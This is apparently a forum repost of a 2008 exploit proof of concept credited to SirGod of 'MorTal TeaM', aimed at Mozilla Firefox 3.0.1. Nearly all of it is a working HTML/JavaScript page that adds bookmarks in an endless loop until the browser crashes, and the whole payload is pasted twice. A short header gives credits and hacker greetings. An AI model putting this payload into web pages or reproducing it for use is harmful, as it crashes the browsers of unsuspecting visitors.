†gsmdiag†
09-28-2008, 11:20 PM
<--
Based on LiquidWorm Remote Denial of Service PoC : http://milw0rm.com/exploits/6434
Discovered By SirGod
MorTal TeaM
Greetz : LiquidWorm , E.M.I.N.E.M , Ras , Puscas_marin , ToxicBlood , HrN , Kemrayz , Raven , Nytr0gen , Str0ke
The script add in favorite menu an URL as favorite named Shit for a infinite cycle that crash Firefox.
-->
<html>
<title>Mozilla Firefox 3.0.1 Remote Denial of Service PoC</Title>
<head>
<body>
<script type="text/javascript">
function romania()
{
title="Shit";
url="http://www.mortal-team.org/";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
for (i=0; i<i+1; i++)
romania();
</script>
</body>
</head>
</html>
Based on LiquidWorm Remote Denial of Service PoC : http://milw0rm.com/exploits/6434
Discovered By SirGod
MorTal TeaM
Greetz : LiquidWorm , E.M.I.N.E.M , Ras , Puscas_marin , ToxicBlood , HrN , Kemrayz , Raven , Nytr0gen , Str0ke
The script add in favorite menu an URL as favorite named Shit for a infinite cycle that crash Firefox.
-->
<html>
<title>Mozilla Firefox 3.0.1 Remote Denial of Service PoC</Title>
<head>
<body>
<script type="text/javascript">
function romania()
{
title="Shit";
url="http://www.mortal-team.org/";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
for (i=0; i<i+1; i++)
romania();
</script>
</body>
</head>
</html>